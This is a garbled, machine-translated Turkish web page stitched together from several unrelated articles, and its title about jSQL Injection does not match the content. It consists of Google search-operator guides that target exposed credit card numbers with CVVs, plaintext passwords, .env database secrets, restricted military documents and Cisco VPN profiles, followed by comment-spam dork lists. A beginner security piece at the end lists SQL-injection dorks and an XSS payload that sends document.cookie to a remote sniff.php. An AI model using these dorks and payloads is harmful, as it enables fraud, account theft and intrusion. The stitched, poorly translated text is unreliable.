Inurl yorum php kimliği isteniyor. Kali Linux'ta SQL enjeksiyonlarını bulmaya ve bunlardan yararlanmaya yönelik çok işlevli bir araç olan jSQL Enjeksiyonunu kullanma talimatları. jSQL Injection ile kaba zorlama karmaları

Her işleç için daha kısa bir ada sahip daha hafif bir sürüm vardır (tümü ön eki olmadan). Aradaki fark, allinurl'ün tüm kelimelerle bağlantılar bulması, inurl'nin ise yalnızca ilk kelimelerle bağlantılar bulması. Sorgudaki ikinci ve sonraki kelimeler web sayfalarının herhangi bir yerinde görünebilir. inurl işleci aynı zamanda anlam bakımından benzer başka bir işleçten farklıdır - site . İlki ayrıca, bilinen güvenlik açıklarına sahip bileşenleri bulmak için yaygın olarak kullanılan, istenen belgeye (örneğin, /cgi-bin/) giden bağlantıda herhangi bir karakter dizisini bulmanızı sağlar.

Pratikte deneyelim. Allintext filtresini alıyoruz ve sorgunun, yalnızca iki yıl sonra (veya sahipleri herkesi arka arkaya beslemekten yorulduğunda) sona erecek olan kredi kartı numaralarının ve doğrulama kodlarının bir listesini döndürmesini sağlıyoruz.

Allintext: kart numarası son kullanma tarihi /2017 cvv

Genç bir bilgisayar korsanının gizli bilgileri çalarak Pentagon veya NASA'nın "sunucularına girdiği" haberini okuduğunuzda, çoğu durumda bu, Google'ı kullanmanın tam da bu temel tekniğidir. NASA çalışanlarının bir listesi ve iletişim bilgileriyle ilgilendiğimizi varsayalım. Elbette böyle bir liste elektronik biçimdedir. Kolaylık sağlamak için veya bir gözetim nedeniyle, kuruluşun web sitesinde de yer alabilir. Dahili kullanım için tasarlandığından, bu durumda ona hiçbir referans olmayacağı mantıklıdır. Böyle bir dosyada hangi kelimeler olabilir? En azından - "adres" alanı. Tüm bu varsayımları test etmek kolaydır.

inurl:nasa.gov dosya türü:xlsx "adres"

Bu tür buluntular hoş bir önemsememek. Gerçekten sağlam olan nokta, Google Web Yöneticisi Operatörleri, Web'in kendisi ve aradığınız şeyin yapısı hakkında daha ayrıntılı bilgi sahibi olmaktan gelir. Ayrıntıları bilerek, geri kalanında gerçekten değerli veriler elde etmek için çıktıyı kolayca filtreleyebilir ve ihtiyacınız olan dosyaların özelliklerini iyileştirebilirsiniz. Bürokrasinin burada kurtarmaya gelmesi komik. Yanlışlıkla Web'e sızan gizli bilgileri aramayı kolaylaştıran tipik formülasyonlar üretir.

Örneğin, ABD Savunma Bakanlığı ofisinde zorunlu olan Dağıtım beyanı damgası, bir belgenin dağıtımına ilişkin standartlaştırılmış kısıtlamalar anlamına gelir. A harfi, gizli hiçbir şeyin olmadığı halka açık yayınları işaret eder; B - yalnızca dahili kullanım için tasarlanmıştır, C - kesinlikle gizlidir ve F'ye kadar böyle devam eder. Ayrı olarak, en yüksek düzeyde bir devlet sırrını temsil eden özellikle değerli bilgileri işaretleyen X harfi vardır. Görev başında yapması gerekenler bu tür belgeleri arasın, biz de kendimizi C harfli dosyalarla sınırlayacağız. DoDI 5230.24'e göre bu tür bir işaretleme, ihracat kontrolüne giren kritik teknolojilerin açıklamasını içeren belgelere atanır. Bu tür özenle korunan bilgileri ABD Ordusuna tahsis edilmiş .mil üst düzey alan adındaki sitelerde bulabilirsiniz.

"DAĞITIM BEYANI C" inurl:navy.mil

.mil domaininde sadece ABD Savunma Bakanlığı ve sözleşmeli kuruluşlarına ait sitelerin toplanması çok uygundur. Etki alanıyla sınırlı arama sonuçları son derece temizdir ve başlıklar kendileri için konuşur. Rus sırlarını bu şekilde aramak pratikte işe yaramaz: .ru ve .rf alanlarında kaos hüküm sürüyor ve birçok silah sisteminin adı kulağa botanik (PP "Kiparis", kundağı motorlu silahlar "Acacia") ve hatta muhteşem (TOS "Pinokyo") gibi geliyor.

.mil etki alanındaki bir sitedeki herhangi bir belgeyi dikkatlice inceleyerek, aramanızı daraltmak için diğer işaretçileri görebilirsiniz. Örneğin, ilginç teknik bilgileri aramak için de uygun olan "Sec 2751" ihracat kısıtlamalarına bir referans. Zaman zaman, bir zamanlar göründüğü resmi sitelerden kaldırılır, bu nedenle, arama sonuçlarında ilginç bir bağlantıyı takip edemiyorsanız, Google önbellek (önbellek operatörü) veya İnternet Arşivi web sitesini kullanın.

Devlet dairelerinden yanlışlıkla gizliliği kaldırılan belgelere ek olarak, Google önbelleğinde ara sıra, herkese açık olarak yayınlanan verilere "özel" bağlantılar oluşturan Dropbox ve diğer veri depolama hizmetlerinden kişisel dosyalara bağlantılar açılır. Alternatif ve kendi kendine yapılan hizmetlerle daha da kötü. Örneğin, aşağıdaki sorgu, yüklü bir FTP sunucusuna sahip olan ve yönlendiricilerinde aktif olarak bir yönlendirici kullanan tüm Verizon istemcilerinin verilerini bulur.

Allinurl:ftp://verizon.net

Şu anda kırk binden fazla akıllı insan var ve 2015 baharında çok daha fazlası vardı. Verizon.net yerine, herhangi bir tanınmış sağlayıcının adını değiştirebilirsiniz ve ne kadar ünlü olursa, yakalama o kadar büyük olabilir. Yerleşik FTP sunucusu aracılığıyla, yönlendiriciye bağlı harici bir sürücüdeki dosyaları görebilirsiniz. Genellikle bu, uzaktan çalışma, kişisel bir bulut veya bir tür eşler arası dosya indirme için bir NAS'dır. Bu tür ortamların tüm içeriği Google ve diğer arama motorları tarafından dizine eklenir, böylece harici sürücülerde depolanan dosyalara doğrudan bir bağlantı aracılığıyla erişebilirsiniz.

Buluta toptan geçişten önce, güvenlik açıkları da olmayan basit FTP sunucuları, uzak depolar olarak hüküm sürüyordu. Birçoğu bugün hala alakalı. Örneğin, popüler WS_FTP Professional programı, ws_ftp.ini dosyasında yapılandırma verilerini, kullanıcı hesaplarını ve parolaları depolar. Bulmak ve okumak kolaydır, çünkü tüm girişler düz metin olarak saklanır ve şifreler minimum düzeyde şaşırtmadan sonra Üçlü DES algoritması kullanılarak şifrelenir. Çoğu sürümde, yalnızca ilk baytın atılması yeterlidir.

WS_FTP Password Decryptor yardımcı programını veya ücretsiz bir web hizmetini kullanarak bu tür parolaların şifresini çözmek kolaydır.

Rastgele bir siteyi hacklemekten bahsederken, genellikle CMS veya e-ticaret uygulama yapılandırma dosyalarının günlüklerinden ve yedeklerinden bir şifre almayı kastederler. Tipik yapılarını biliyorsanız, anahtar kelimeleri kolayca belirtebilirsiniz. ws_ftp.ini'de bulunanlara benzer satırlar son derece yaygındır. Örneğin, Drupal ve PrestaShop her zaman bir kullanıcı kimliğine (UID) ve karşılık gelen bir parolaya (pwd) sahiptir ve tüm bilgiler .inc uzantılı dosyalarda saklanır. Bunları şu şekilde arayabilirsiniz:

"pwd=" "UID=" dahili:inc

SQL sunucularının yapılandırma dosyalarında, kullanıcı adları ve e-posta adresleri düz metin olarak saklanır ve parolalar yerine MD5 hash'leri kaydedilir. Kesin konuşmak gerekirse bunların şifresini çözmek imkansızdır, ancak bilinen hash-parola çiftleri arasında bir eşleşme bulabilirsiniz.

Şimdiye kadar, parola karması bile kullanmayan DBMS'ler var. Herhangi birinin yapılandırma dosyaları tarayıcıda kolayca görüntülenebilir.

Metin:DB_PASSWORD dosya türü:env

Windows sunucularının gelişiyle, yapılandırma dosyalarının yeri kısmen kayıt defteri tarafından alındı. Dosya türü olarak reg'i kullanarak dalları arasında tamamen aynı şekilde arama yapabilirsiniz. Örneğin, bunun gibi:

Filetype:reg HKEY_CURRENT_USER "Şifre"=

Bazen Google tarafından yanlışlıkla açılan ve yakalanan veriler yardımıyla gizli bilgilere ulaşmak mümkündür. İdeal seçenek, bazı yaygın biçimlerde bir parola listesi bulmaktır. Hesap bilgilerini bir metin dosyasında, bir Word belgesinde veya bir Excel elektronik tablosunda yalnızca çaresiz insanlar saklayabilir, ancak bunlardan her zaman yeterince vardır.

Dosya türü:xls inurl:şifre

Bir yandan, bu tür olayları önlemenin birçok yolu vardır. htaccess, patch CMS'de yeterli erişim haklarının belirtilmesi, sol betiklerin kullanılmaması ve diğer deliklerin kapatılması gerekmektedir. Ayrıca, arama motorlarının içinde belirtilen dosya ve dizinleri dizine eklemesini yasaklayan robots.txt dışlama listesine sahip bir dosya da vardır. Öte yandan, bazı sunuculardaki robots.txt yapısı standart olandan farklıysa, üzerinde neyi saklamaya çalıştıkları hemen anlaşılır.

Herhangi bir sitedeki dizinlerin ve dosyaların listesinden önce standart yazıt dizini gelir. Hizmet amacıyla başlıkta görünmesi gerektiğinden, aramasını intitle operatörüyle sınırlamak mantıklıdır. /admin/, /personal/, /etc/ ve hatta /secret/ dizinlerinde ilginç şeyler bulunabilir.

Alaka düzeyi burada son derece önemlidir: eski güvenlik açıkları çok yavaş kapatılır, ancak Google ve arama sonuçları sürekli değişir. "Son saniye" filtresi (istek url'sinin sonunda &tbs=qdr:s) ile "gerçek zamanlı" filtresi (&tbs=qdr:1) arasında bile fark vardır.

Google'dan son dosya güncelleme tarihinin zaman aralığı da dolaylı olarak belirtilir. Grafik web arayüzü aracılığıyla, tipik dönemlerden birini (saat, gün, hafta vb.) seçebilir veya bir tarih aralığı belirleyebilirsiniz, ancak bu yöntem otomasyon için uygun değildir.

Adres çubuğunun görünümünden, yalnızca &tbs=qdr: yapısını kullanarak sonuçların çıktısını sınırlamanın bir yolu hakkında tahminde bulunulabilir. Ondan sonraki y harfi bir yılın sınırını belirtir (&tbs=qdr:y), m geçen ay, w hafta, d son gün, h son saat, n dakika ve s saniye sonuçlarını gösterir. Google'ın yeni öğrendiği en son sonuçlar, &tbs=qdr:1 filtresi kullanılarak bulunur.

Zor bir komut dosyası yazmanız gerekiyorsa, tarih aralığının Google'da tarih aralığı operatörü aracılığıyla Jülyen biçiminde ayarlandığını bilmek yararlı olacaktır. Örneğin, 1 Ocak ile 1 Temmuz 2015 arasında yüklenen ve içinde gizli kelimesi bulunan PDF belgelerinin listesini bu şekilde bulabilirsiniz.

Gizli dosya türü:pdf tarih aralığı:2457024-2457205

Aralık, Jülyen tarih biçiminde ondalık basamaklar olmadan belirtilir. Bunları Miladi takvimden manuel olarak çevirmek sakıncalıdır. Bir tarih dönüştürücü kullanmak daha kolaydır.

Arama sorgusunda ek operatörler belirtmenin yanı sıra, doğrudan bağlantı gövdesinde gönderilebilirler. Örneğin, filetype:pdf özelliği, as_filetype=pdf yapısına karşılık gelir. Bu nedenle, herhangi bir açıklama ayarlamak uygundur. Arama URL'sine cr=countryHN yapısı eklenerek yalnızca Honduras Cumhuriyeti'nden elde edilen sonuçların çıktısının ayarlandığını, ancak yalnızca Bobruisk şehrinden - gcs=Bobruisk olduğunu varsayalım. tam listesi için geliştirici bölümüne bakın.

Google'ın otomasyon araçları, hayatı kolaylaştırmak için tasarlanmıştır, ancak genellikle güçlükleri artırır. Örneğin, bir kullanıcının şehri, WHOIS aracılığıyla kullanıcının IP'si tarafından belirlenir. Google, bu bilgilere dayanarak yalnızca sunucular arasındaki yükü dengelemekle kalmaz, aynı zamanda arama sonuçlarını da değiştirir. Bölgeye bağlı olarak, aynı sorgu için ilk sayfaya farklı sonuçlar gelir ve bazıları tamamen gizlenebilir. Kendinizi bir kozmopolit gibi hissedin ve herhangi bir ülkeden bilgi aramak, gl=country direktifinden sonraki iki harfli koduna yardımcı olacaktır. Örneğin, Hollanda'nın kodu NL iken, Vatikan ve Kuzey Kore'nin Google'da kendi kodları yoktur.

Çoğu zaman, birkaç gelişmiş filtre kullandıktan sonra bile arama sonuçları dağınıktır. Bu durumda, sorguya birkaç istisna sözcük ekleyerek (her birinin önünde bir eksi işareti vardır) sorguyu hassaslaştırmak kolaydır. Örneğin, bankacılık , adlar ve öğretici genellikle Kişisel sözcüğüyle birlikte kullanılır. Bu nedenle, daha temiz arama sonuçları, bir sorgunun ders kitabı örneğini değil, rafine edilmiş bir örneğini gösterecektir:

Intitle:"/Kişisel/ Dizini" -isimler -öğretici -bankacılık

Sofistike bir bilgisayar korsanı, ihtiyaç duyduğu her şeyi kendi başına sağlamasıyla ayırt edilir. Örneğin, bir VPN uygun bir şeydir, ancak ya pahalıdır ya da geçicidir ve kısıtlamaları vardır. Tek başınıza kaydolmak çok pahalıdır. Grup aboneliklerinin olması iyi bir şey ve Google'ın yardımıyla bir grubun parçası olmak çok kolay. Bunu yapmak için, oldukça standart olmayan bir PCF uzantısına ve tanınabilir bir yola sahip Cisco VPN yapılandırma dosyasını bulmanız yeterlidir: Program Files\Cisco Systems\VPN Client\Profiles . Bir istek ve örneğin, Bonn Üniversitesi'nin güler yüzlü personeline katılın.

Dosya tipi: pcf vpn VEYA Grup

Parolalar şifreli biçimde saklanır, ancak Maurice Massard zaten şifrelerini çözmek için bir program yazdı ve bunu thecampusgeeks.com aracılığıyla ücretsiz olarak sağlıyor.

Google yardımıyla yüzlerce farklı türde saldırı ve penetrasyon testi yapılmaktadır. Popüler programları, ana veritabanı biçimlerini, çok sayıda PHP güvenlik açığını, bulutları vb. etkileyen birçok seçenek vardır. Tam olarak ne aradığınızı bilmek, ihtiyaç duyduğunuz bilgileri (özellikle de halka açık hale getirmeyi düşünmediğiniz bilgileri) almayı çok daha kolaylaştırır. Sadece Shodan ilginç fikirleri değil, indekslenmiş ağ kaynaklarının herhangi bir veri tabanını da besliyor!

Muhtemelen herkes Google gibi bir arama motorunun nasıl kullanılacağını biliyordur =) Ancak, özel yapıları kullanarak doğru bir arama sorgusu oluşturursanız, aradığınız sonuca çok daha verimli ve hızlı bir şekilde ulaşabileceğinizi herkes bilmez =) Bu makalede, doğru arama yapmak için neleri ve nasıl yapmanız gerektiğini göstermeye çalışacağım.

Google, google.com'da arama yaparken özel anlam taşıyan birkaç gelişmiş arama operatörünü destekler. Tipik olarak, bu operatörler aramayı değiştirir ve hatta Google'a tamamen farklı arama türleri yapmasını söyler. Örneğin, link: build özel bir işleçtir ve sorgu bağlantı: www.google.com size normal bir arama yapmayacak, bunun yerine google.com'a bağlantıları olan tüm web sayfalarını bulacaktır.
alternatif istek türleri

önbellek: Sorguya başka kelimeler eklerseniz, Google önbelleğe alınan belgede bulunan kelimeleri vurgulayacaktır.
Örneğin, önbellek: www.web sitesi"web" kelimesi vurgulanmış olarak önbelleğe alınmış içeriği gösterecektir.

link: Yukarıdaki arama sorgusu, belirtilen sorguya bağlantılar içeren web sayfalarını gösterecektir.
Örneğin: bağlantı: www.web sitesi http://www.site bağlantısı olan tüm sayfaları görüntüler.

ilgili: Belirtilen web sayfasıyla "ilgili" web sayfalarını görüntüler.
Örneğin, ilgili: www.google.com Google ana sayfasına benzer web sayfalarını listeler.

info: Bilgi İste: istenen web sayfası hakkında Google'ın sahip olduğu bazı bilgileri sağlayacaktır.
Örneğin, bilgi:web sitesi forumumuz hakkında bilgi gösterecek =) (Armada - Yetişkin web yöneticilerinin forumu).

Diğer bilgi talepleri

define: define: sorgusu, bundan sonra yazdığınız kelimelerin çeşitli çevrimiçi kaynaklardan derlenmiş bir tanımını sağlayacaktır. Tanım, girilen ifadenin tamamı için olacaktır (yani, tam sorgudaki tüm kelimeleri içerecektir).

hisse senetleri: Hisse senetleri ile bir sorgu başlatırsanız: Google, sorgu terimlerinin geri kalanını hisse senetleri olarak kabul eder ve bu karakterler için hazırlanmış bilgileri gösteren bir sayfaya bağlantı verir.
Örneğin, hisse senetleri: intel yahoo Intel ve Yahoo hakkında bilgi gösterecektir. (Şirket adını değil, son dakika haber karakterlerini yazdırmanız gerektiğini unutmayın)

İstek Değiştiriciler

site: Sorgunuza site: eklerseniz, Google sonuçları o alanda bulduğu web siteleriyle sınırlandırır.
Ayrıca ru, org, com, vb. gibi ayrı bölgeleri de arayabilirsiniz ( site: com site:ru)

allintitle: allintitle: ile bir sorgu çalıştırırsanız, Google sonuçları başlıktaki tüm sorgu sözcükleriyle sınırlandırır.
Örneğin, allintitle: google arama resimler, Blog vb. gibi tüm Google arama sayfalarını döndürür

intitle: Sorgunuza intitle: eklerseniz, Google, sonuçları başlıkta o kelimeyi içeren belgelerle kısıtlar.
Örneğin, başlık:iş

allinurl: allinurl ile bir sorgu çalıştırırsanız: Google, sonuçları URL'deki tüm sorgu sözcükleriyle sınırlayacaktır.
Örneğin, allinurl: google arama google ile belgeleri döndürür ve başlıkta arama yapar. Ayrıca, bir seçenek olarak, kelimeleri eğik çizgi (/) ile ayırabilirsiniz, ardından eğik çizginin her iki tarafındaki kelimeler aynı sayfada aranacaktır: Örnek allinurl: foo/bar

inurl: Sorgunuza inurl: eklerseniz, Google sonuçları URL'de o kelimeyi içeren belgelerle kısıtlar.
Örneğin, Animasyon girişi:web sitesi

intext: belirtilen kelimeyi yalnızca sayfanın metninde arar, bağlantıların başlığını ve metinlerini ve ilgili olmayan diğer şeyleri göz ardı eder.Bu değiştiricinin bir türevi de vardır - allintext: yani. ayrıca, sorgudaki tüm kelimeler yalnızca metin içinde aranacaktır, bu da önemlidir, bağlantılarda sık kullanılan kelimeler göz ardı edilir.
Örneğin, metin:forum

tarih aralığı: zaman dilimlerinde arama yapar (tarih aralığı:2452389-2452389), saatlerin tarihleri ​​Jülyen biçiminde belirtilir.

Pekala, ve her türlü ilginç istek örneği

Google için sorgu derleme örnekleri. Spam gönderenler için

inurl:control.guest?a=işaret

Site:books.dreambook.com "Ana Sayfa URL'si" "İmzala" inurl:sign

Site:www.freegb.net Ana Sayfa

Inurl:sign.asp "Karakter Sayısı"

"Mesaj:" inurl:sign.cfm "Gönderen:"

inurl:register.php "Kullanıcı Kaydı" "Web Sitesi"

Inurl:edu/guestbook “Ziyaretçi Defterini İmzalayın”

Inurl:post "Yorum Gönder" "URL"

Inurl:/archives/ "Yorumlar:" "Bilgiyi hatırladın mı?"

“Komut Dosyası ve Ziyaretçi Defteri Oluşturan:” “URL:” “Yorumlar:”

inurl:?action=“phpBook” “URL” ekleyin

Intitle:"Yeni Hikaye Gönder"

Dergiler

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=yanıtla

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Ziyaretçi defteri"

Bloglar

Inurl:blogger.com/comment.g?”postID”"anonim"

Inurl:typepad.com/ “Yorum gönder” “Kişisel bilgileri hatırlıyor musun?”

Inurl:greatestjournal.com/community/ "Yorum gönder" "anonim gönderenlerin adresleri"

“Yorum gönder” “isimsiz gönderenlerin adresleri” -

Intitle:"Yorum gönder"

Inurl:pirillo.com "Yorum gönder"

Forumlar

Inurl:gate.html?”name=Forumlar” “mode=yanıt”

inurl:”forum/posting.php?mode=yanıtla”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php?”

Biraz bilgi güvenliğinden bahsetmeye karar verdim. Makale acemi programcılar ve Frontend geliştirmeye yeni başlayanlar için faydalı olacaktır. Sorun nedir?

Birçok acemi geliştirici, kod yazmaya o kadar bağımlıdır ki, işlerinin güvenliğini tamamen unuturlar. Ve en önemlisi, SQL sorgusu, XXS gibi güvenlik açıklarını unutuyorlar. Ayrıca yönetim panelleri için kolay şifreler buluyorlar ve kaba kuvvete maruz kalıyorlar. Bu saldırılar nelerdir ve nasıl önlenebilir?

SQL enjeksiyonu, belirli bir DBMS için bir SQL sorgusu ile gerçekleştirilen en yaygın veritabanı saldırısı türüdür. Birçok kişi ve hatta büyük şirketler bu tür saldırılardan muzdariptir. Bunun nedeni, bir geliştiricinin bir veritabanı ve aslında SQL sorguları yazarken yaptığı hatadır.

SQL sorgularında kullanılan giriş verilerinin yanlış işlenmesi nedeniyle bir SQL enjeksiyon tipi saldırı mümkündür. Bir bilgisayar korsanının başarılı bir saldırısıyla, yalnızca veritabanlarının içeriğini değil, aynı zamanda yönetim panelinin sırasıyla şifrelerini ve günlüklerini de kaybetme riskiyle karşı karşıya kalırsınız. Ve bu veriler, siteyi tamamen ele geçirmek veya üzerinde geri dönüşü olmayan ayarlamalar yapmak için oldukça yeterli olacaktır.

Saldırı, PHP, ASP, Perl ve diğer dillerde yazılmış betiklerde başarıyla yeniden üretilebilir. Bu tür saldırıların başarısı daha çok hangi DBMS'nin kullanıldığına ve senaryonun kendisinin nasıl uygulandığına bağlıdır. Dünyada SQL enjeksiyonları için savunmasız birçok site var. Bunu doğrulamak kolaydır. "Dorks" girmek yeterlidir - bunlar, savunmasız siteleri bulmak için özel isteklerdir. Bunlardan bazıları:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Nasıl kullanılır? Bunları Google veya Yandex arama motoruna girmeniz yeterlidir. Arama motoru size yalnızca savunmasız bir site değil, aynı zamanda bu güvenlik açığı için bir sayfa da verecektir. Ancak burada durup sayfanın gerçekten savunmasız olduğundan emin olmayacağız. Bunun için “id=1” değerinden sonra tek tırnak “‘” koymak yeterlidir. Bunun gibi bir şey:

• inurl:games.php?id=1'

Ve site bize SQL sorgusu hakkında bir hata verecektir. Bilgisayar korsanımızın bundan sonra neye ihtiyacı var?

Ve sonra, sayfanın bu bağlantısına bir hata ile ihtiyacı var. Daha sonra çoğu durumda güvenlik açığı üzerinde çalışma, bu kısım için yardımcı programlarıyla birlikte "Kali linux" dağıtımında gerçekleştirilir: enjeksiyon kodunun tanıtılması ve gerekli işlemlerin gerçekleştirilmesi. Bu nasıl olacak, sana söyleyemem. Ancak bununla ilgili bilgileri internette bulabilirsiniz.

Bu saldırı türü çerezler üzerinde gerçekleştirilir. Buna karşılık, kullanıcıları kurtarmaya çok düşkünler. Neden? Onlarsız nasıl? Sonuçta, Çerezler sayesinde, Vk.com veya Mail.ru'dan yüzlerce kez şifre girmiyoruz. Ve onları reddeden çok az kişi var. Ancak internette, bilgisayar korsanları için genellikle bir kural vardır: uygunluk katsayısı, güvensizlik katsayısı ile doğru orantılıdır.

Bir XSS saldırısı uygulamak için bilgisayar korsanımızın JavaScript bilgisine ihtiyacı vardır. Dil ilk bakışta çok basit ve zararsızdır çünkü bilgisayar kaynaklarına erişimi yoktur. Bir bilgisayar korsanı, yalnızca bir tarayıcıda JavaScript ile çalışabilir, ancak bu kadarı yeterlidir. Sonuçta, asıl şey kodu web sayfasına girmektir.

Saldırı süreci hakkında ayrıntılara girmeyeceğim. Bunun nasıl olduğunun sadece temellerini ve anlamını anlatacağım.

Bir bilgisayar korsanı, bazı forumlara veya ziyaretçi defterine JS kodu ekleyebilir:

Document.location.href="http://192.168.1.7/sniff.php?test"

Komut dosyaları bizi, kodun yürütüleceği virüslü bir sayfaya yönlendirir: ister bir algılayıcı, ister bir tür depolama veya bir şekilde Çerezlerimizi önbellekten çalacak bir istismar.

Neden JavaScript? Çünkü JavaScript, web istekleri konusunda harikadır ve tanımlama bilgilerine erişimi vardır. Ancak betiğimiz bizi bir siteye aktarırsa, kullanıcı bunu kolayca fark edecektir. Burada bilgisayar korsanı daha kurnaz bir seçenek kullanır - sadece kodu resme girer.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Basitçe bir görüntü oluşturuyoruz ve betiğimizi ona bir adres olarak atadık.

Kendinizi tüm bunlardan nasıl korursunuz? Çok basit - şüpheli bağlantıları takip etmeyin.

DoS (İngilizce Hizmet Reddi'nden - hizmet reddi, bir bilgisayar sistemini başarısızlığa uğratmak amacıyla yapılan bir bilgisayar korsanı saldırısıdır. Bu, sistemin vicdani kullanıcılarının sağlanan sistem kaynaklarına (sunuculara) erişemeyeceği veya bu erişimin zor olduğu koşulların yaratılmasıdır. Sistemin arızalanması, acil bir durumda yazılım herhangi bir kritik bilgi verirse, sistemin ele geçirilmesine yönelik bir adım olabilir: örneğin, sürüm, program kodunun bir kısmı, vb. Ancak çoğu zaman bu, ekonomik baskının bir ölçüsüdür: gelir getiren basit bir hizmetin kaybı. Sağlayıcıdan gelen faturalar veya saldırıyı önlemek için alınan önlemler cepteki "hedefi" önemli ölçüde vurdu. Şu anda DoS ve DDoS saldırıları, yasal olarak önemli kanıtlar bırakmadan hemen hemen her sistemi başarısızlığa uğratmanıza izin verdiği için en popüler olanlardır.

DoS ve DDos saldırıları arasındaki fark nedir?

DoS, akıllı bir şekilde oluşturulmuş bir saldırıdır. Örneğin, sunucu gelen paketlerin doğruluğunu kontrol etmezse, bilgisayar korsanı sonsuza kadar işlenecek böyle bir talepte bulunabilir ve diğer bağlantılarla çalışmak için yeterli işlemci süresi olmayacaktır. Buna göre, müşteriler bir hizmet reddi alacaklardır. Ancak, iyi bilinen büyük siteleri bu şekilde aşırı yüklemek veya devre dışı bırakmak işe yaramayacaktır. Oldukça geniş kanallara ve bu tür bir aşırı yük ile kolayca başa çıkabilecek süper güçlü sunuculara sahipler.

DDoS aslında DoS ile aynı saldırıdır. Ancak DoS'ta bir istek paketi varsa, o zaman DDoS'ta yüzlerce veya daha fazlası olabilir. Ağır hizmet sunucuları bile bu tür bir aşırı yük ile baş edemeyebilir. Sana bir örnek vereceğim.

Bir DoS saldırısı, birisiyle sohbet ederken, sonra kötü huylu bir kişinin gelip yüksek sesle bağırmaya başlamasıdır. Konuşmak ya imkansızdır ya da çok zordur. Çözüm: Kişiyi sakinleştirecek ve odadan çıkaracak olan güvenliği arayın. DDoS saldırıları, bu tür binlerce kötü niyetli insanın içeri girdiği zamandır. Bu durumda, gardiyanlar bükülüp herkesi alamayacak.

DoS ve DDoS, zombi denilen bilgisayarlardan üretilir. Bunlar, makinelerinin herhangi bir sunucunun saldırısına karıştığından şüphelenmeyen bilgisayar korsanları tarafından saldırıya uğrayan kullanıcıların bilgisayarlarıdır.

Kendinizi bundan nasıl korursunuz? Genel olarak, hiçbir şekilde. Ancak bir bilgisayar korsanının görevini karmaşıklaştırabilirsiniz. Bunu yapmak için, güçlü sunuculara sahip iyi bir barındırma seçmeniz gerekir.

Bir geliştirici çok sayıda saldırı koruma sistemi bulabilir, yazdığımız komut dosyalarını tamamen gözden geçirebilir, sitede güvenlik açıkları olup olmadığını kontrol edebilir vb. Ancak site düzeninin son aşamasına gelince, yani sadece yönetici paneline bir şifre koyacağı zaman, bir şeyi unutabiliyor. Şifre!

Basit bir parola belirlemeniz kesinlikle önerilmez. 12345, 1114457, vasya111 vb. olabilir. 10-11 karakterden daha kısa şifreler belirlemeniz önerilmez. Aksi takdirde, en yaygın ve karmaşık olmayan saldırıya maruz kalabilirsiniz - Brute Force.

Brute force, özel programlar kullanan sözlük tabanlı bir parola kaba kuvvet saldırısıdır. Sözlükler farklı olabilir: Latince, sayılara göre sıralama, diyelim ki belli bir aralığa kadar, karışık (Latince + sayılar) ve hatta benzersiz sembollere sahip sözlükler bile var @#4$%&*~~`'”\ ? vesaire.

Elbette bu tür saldırılardan kaçınmak kolaydır, karmaşık bir parola bulmak yeterlidir. Captcha bile sizi kurtarabilir. Ayrıca, siteniz CMS'de yapılmışsa, birçoğu benzer bir saldırı türü hesaplar ve ip'yi engeller. Parolada ne kadar farklı karakter varsa, onu almanın o kadar zor olduğunu her zaman hatırlamalıyız.

Bilgisayar korsanları nasıl çalışır? Çoğu durumda, ya şüphelenirler ya da şifrenin bir kısmını zaten bilirler. Kullanıcı şifresinin kesinlikle 3 veya 5 karakterden oluşmayacağını varsaymak oldukça mantıklıdır. Bu tür şifreler sık ​​sık bilgisayar korsanlığına yol açar. Temel olarak, bilgisayar korsanları 5 ila 10 karakter aralığını alır ve oraya muhtemelen önceden bildikleri birkaç karakter ekler. Ardından, istenen aralıklarda parolalar oluşturun. Kali linux dağıtımının bile bu tür durumlar için programları vardır. Ve işte, sözlüğün hacmi artık o kadar büyük olmadığı için saldırı artık uzun sürmeyecek. Ek olarak, bir bilgisayar korsanı video kartının gücünü kullanabilir. Bazıları CUDA sistemini desteklerken numaralandırma hızı 10 kata kadar artar. Ve şimdi bu kadar basit bir saldırının oldukça gerçek olduğunu görüyoruz. Ancak yalnızca siteler kaba kuvvete maruz kalmaz.

Sevgili geliştiriciler, bilgi güvenliği sistemini asla unutmayın, çünkü günümüzde devletler dahil birçok insan bu tür saldırılardan muzdariptir. Ne de olsa, en büyük güvenlik açığı, her zaman bir yerde dikkati dağılabilen veya bir yeri gözden kaçırabilen bir kişidir. Biz programcıyız ama programlanmış makine değiliz. Her zaman tetikte olun, çünkü bilgi kaybı ciddi sonuçlar doğurabilir!